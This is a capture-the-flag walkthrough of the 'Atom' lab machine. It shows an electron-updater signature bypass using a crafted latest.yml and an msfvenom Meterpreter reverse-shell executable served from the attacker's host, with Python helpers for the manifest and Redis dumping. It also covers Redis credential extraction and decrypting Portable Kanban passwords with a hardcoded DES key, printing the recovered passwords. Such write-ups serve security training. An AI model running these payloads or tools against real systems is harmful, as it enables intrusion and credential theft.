Basic information

Port scan

$ nmap -sC -sV 10.10.10.237
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-21 13:55 CST
Nmap scan report for 10.10.10.237
Host is up (0.070s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h20m01s, deviation: 4h02m30s, median: 0s
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: ATOM
| NetBIOS computer name: ATOM\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-04-20T22:57:12-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-21T05:57:11
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.12 seconds

80/443

Heed solutions:

SMB

SMB exposes a share named Software_Updates:

Software_Updates

Inside are three client folders and a PDF. Download the PDF and read it:

UAT_Testing_Procedures

The PDF tells us the application is packaged with electron-builder, and that an update dropped into any of the client folders is picked up and installed by an automated QA process. The catch is that electron-builder's updater (electron-updater) verifies the signature of what it downloads, so a plain replacement binary will not be run.

electron-builder

Searching for that turns up the relevant material:

In short, a crafted latest.yml can make the updater fetch and execute a program of our choosing. The payload used below relies on a single quote in the executable's filename: on Windows, electron-updater checks the download's Authenticode signature by running a PowerShell command with the file path quoted inline, and a quote in the name breaks that command, so the signature check never completes and the updater proceeds. Two other conditions still have to hold: the version in latest.yml must be higher than the installed one, and the sha512 field must match the file actually served, because the updater re-hashes the download.

exploit

Generate the exe, compute its hash, drop the yml file into a client folder, and wait for the automated QA run to trigger it. The sha512 field is the base64 of the raw digest, not of the hex string, hence the xxd -r -p step in the pipeline:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f exe -o "r'miao.exe"

shasum -a 512 "r'miao.exe" | cut -d " " -f1 | xxd -r -p | base64 -w 0
lNGCU+j3Qkn/F6VrPXlauNYygdmb1kYwQu6QmkqqCzNcguJMWr2vWDJxb5MoAdbKSZ5QMaiFdzshpnXaVcx7iQ==

latest.yml

version: 1.2.3
path: http://10.10.14.10:7777/r'miao.exe
sha512: lNGCU+j3Qkn/F6VrPXlauNYygdmb1kYwQu6QmkqqCzNcguJMWr2vWDJxb5MoAdbKSZ5QMaiFdzshpnXaVcx7iQ==
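As an added example (not part of the original write-up or of electron-builder itself), the following Python script reproduces the manifest-building step: it computes the sha512 field exactly as the shell pipeline above does, writes a minimal latest.yml, and includes the client-side check the updater performs (re-hashing the payload against the manifest). The payload bytes, version string and URL are parameters; the quote check only flags the filename pattern the payload above uses, it does not model the updater's PowerShell call.

```python
import base64
import hashlib


def sha512_b64(data: bytes) -> str:
    """sha512 field as electron-builder writes it: base64 of the raw 64-byte
    digest. Equivalent to: shasum -a 512 | cut -d" " -f1 | xxd -r -p | base64 -w 0
    """
    return base64.b64encode(hashlib.sha512(data).digest()).decode("ascii")


def build_latest_yml(version: str, url: str, data: bytes) -> str:
    """Return a minimal latest.yml for electron-updater.

    electron-updater only installs a version greater than the running one and
    re-hashes the download against the sha512 field, so the manifest must be
    regenerated whenever the payload changes. The path is written verbatim;
    no quoting or escaping is applied to it.
    """
    return "\n".join([
        f"version: {version}",
        f"path: {url}",
        f"sha512: {sha512_b64(data)}",
        "",
    ])


def parse_latest_yml(text: str) -> dict:
    """Tiny 'key: value' parser for the flat manifest above (no PyYAML needed).
    Splits on the first colon only, so URLs in the path field survive."""
    fields = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()
    return fields


def manifest_matches(text: str, data: bytes) -> bool:
    """The updater's integrity check: does the served payload hash to the
    manifest's sha512? A stale manifest fails here before anything runs."""
    return parse_latest_yml(text).get("sha512") == sha512_b64(data)


def filename_has_quote(text: str) -> bool:
    """Flag a manifest whose path contains a single quote, the pattern the
    payload above relies on (assumed indicator, useful when reviewing
    update feeds for this trick)."""
    return "'" in parse_latest_yml(text).get("path", "")


if __name__ == "__main__":
    import sys
    # Usage: python3 make_manifest.py <payload.exe> <url> <version>
    with open(sys.argv[1], "rb") as f:
        payload = f.read()
    print(build_latest_yml(sys.argv[3], sys.argv[2], payload), end="")
```

Run it against the generated exe with the URL and version from the manifest above and drop the output into the client folder as latest.yml; if the exe is regenerated, rerun the script, since a mismatched sha512 is rejected before the signature step is ever reached.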

user flag

user.txt is then on jason's desktop:

Privilege escalation information

Basic enumeration turns up Redis. Its configuration file is readable and contains the requirepass password in cleartext:

C:\Program Files\Redis>type redis.windows-service.conf
type redis.windows-service.conf
# Redis configuration file example
requirepass kidvscat_yes_kidvscat
...

redis

Authenticating to Redis with that password and enumerating the keys yields the Administrator's encrypted password:

10.10.10.237:6379> keys *
1) "pk:ids:MetaDataClass"
2) "pk:ids:User"
3) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
4) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
10.10.10.237:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
10.10.10.237:6379>
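As an added example (not part of the original write-up), the exchange above expressed at the protocol level: a small RESP encoder/decoder that builds the AUTH, KEYS and GET commands the way redis-cli sends them, parses the replies, and pulls the EncryptedPassword field out of the pk:urn:user:* JSON record. The `dump_users` function is the live version against a host, port and password you supply; the sample buffer at the bottom is constructed here (the server replies are not captured from the target, only the JSON record is the one shown above) so the parser can be exercised offline.

```python
import json
import socket


def resp_command(*args: str) -> bytes:
    """Encode a command as a RESP array, exactly as redis-cli sends it:
    *<argc>\\r\\n followed by $<len>\\r\\n<arg>\\r\\n for each argument."""
    out = [f"*{len(args)}\r\n".encode()]
    for a in args:
        b = a.encode("utf-8")
        out.append(f"${len(b)}\r\n".encode() + b + b"\r\n")
    return b"".join(out)


def parse_resp(buf: bytes):
    """Decode one RESP reply from buf and return (value, remaining_bytes).

    Covers the types seen during this enumeration: simple strings (+),
    errors (-), integers (:), bulk strings ($) and arrays (*).
    """
    head, sep, rest = buf.partition(b"\r\n")
    if not sep:
        raise ValueError("incomplete reply")
    kind, body = head[:1], head[1:]
    if kind == b"+":
        return body.decode(), rest
    if kind == b"-":
        raise RuntimeError(body.decode())   # e.g. NOAUTH / WRONGPASS from AUTH
    if kind == b":":
        return int(body), rest
    if kind == b"$":
        n = int(body)
        if n == -1:
            return None, rest               # nil bulk: key does not exist
        if len(rest) < n + 2:
            raise ValueError("incomplete reply")
        return rest[:n].decode("utf-8"), rest[n + 2:]
    if kind == b"*":
        items = []
        for _ in range(int(body)):
            item, rest = parse_resp(rest)
            items.append(item)
        return items, rest
    raise ValueError(f"unknown RESP type {kind!r}")


def extract_user_record(value: str) -> dict:
    """Keep only the fields that matter from a pk:urn:user:* JSON value."""
    rec = json.loads(value)
    return {"Name": rec["Name"], "Role": rec["Role"],
            "EncryptedPassword": rec["EncryptedPassword"]}


def dump_users(host: str, port: int, password: str) -> list:
    """Live version: AUTH, KEYS pk:urn:user:*, then GET each key."""
    s = socket.create_connection((host, port), timeout=5)

    def call(*args):
        s.sendall(resp_command(*args))
        buf = b""
        while True:
            chunk = s.recv(65536)
            if not chunk:
                raise ConnectionError("server closed the connection")
            buf += chunk
            try:
                value, _ = parse_resp(buf)
                return value
            except ValueError:
                continue                    # reply not complete yet, keep reading

    try:
        call("AUTH", password)
        keys = call("KEYS", "pk:urn:user:*")
        return [extract_user_record(call("GET", k)) for k in keys]
    finally:
        s.close()


def bulk(data: bytes) -> bytes:
    """RESP bulk string, used to build the constructed sample below."""
    return f"${len(data)}\r\n".encode() + data + b"\r\n"


# Constructed sample (not captured from the target): the replies to AUTH,
# KEYS pk:urn:user:* and GET, back to back in one buffer.
SAMPLE_USER_KEY = b"pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
SAMPLE_USER_JSON = json.dumps({
    "Id": "e8e29158d70d44b1a1ba4949d52790a0", "Name": "Administrator",
    "Initials": "", "Email": "",
    "EncryptedPassword": "Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi",
    "Role": "Admin", "Inactive": False, "TimeStamp": 637530169606440253,
}).encode()
SAMPLE_REPLIES = b"+OK\r\n" + b"*1\r\n" + bulk(SAMPLE_USER_KEY) + bulk(SAMPLE_USER_JSON)


def parse_sample() -> dict:
    """Walk the constructed buffer the way dump_users walks the socket."""
    ok, rest = parse_resp(SAMPLE_REPLIES)
    keys, rest = parse_resp(rest)
    value, rest = parse_resp(rest)
    if ok != "OK" or rest != b"":
        raise ValueError("unexpected sample layout")
    return {keys[0]: extract_user_record(value)}


if __name__ == "__main__":
    import sys
    # Usage: python3 redis_users.py 10.10.10.237 6379 kidvscat_yes_kidvscat
    for u in dump_users(sys.argv[1], int(sys.argv[2]), sys.argv[3]):
        print(u)
```

Note that KEYS is fine on a box this small but blocks the server on a large keyspace; SCAN with a MATCH pattern is the polite equivalent if you reuse this elsewhere.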

document

The winPEAS output lists a user guide; download it and read it:

[+] Looking for documents --limit 100--(T1083)
C:\Users\jason\Documents\UAT_Testing_Procedures.pdf
C:\Users\jason\Downloads\PortableKanban\User Guide.pdf

The guide shows that the value in Redis is a password encrypted by Portable Kanban. Searching for how it encrypts passwords turns up a decryption method:

decrypt

Decrypting it gives the Administrator password:

python3 decrypt.py
Enter the Hash : Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi
Decrypted Password : kidvscat_admin_@123

The script on GitHub reads the encrypted value out of the PortableKanban data file; it can be trimmed to take the hash directly. Portable Kanban uses DES in CBC mode with a key and IV hardcoded in the application, which is why a single fixed key decrypts every install's passwords:

import base64
from des import DesKey  # python3 -m pip install des

# Portable Kanban stores passwords as base64(DES-CBC(password)) using a fixed
# key and IV compiled into the application; both values come from the public
# decryption script referenced above.
KEY = b"7ly6UznJ"
IV = b"XuVUm5fR"

try:
    enc = input("Enter the Hash : ")
    raw = base64.b64decode(enc.encode("utf-8"))
    key = DesKey(KEY)
    # padding=True strips the PKCS#5 padding after decryption
    plain = key.decrypt(raw, initial=IV, padding=True).decode("utf-8")
    print("Decrypted Password : " + plain)
except Exception:
    # bad base64, wrong length, or padding/decoding failure
    print("Wrong Hash")

root flag

Then log in as Administrator over WinRM with that password; root.txt is on the desktop:

References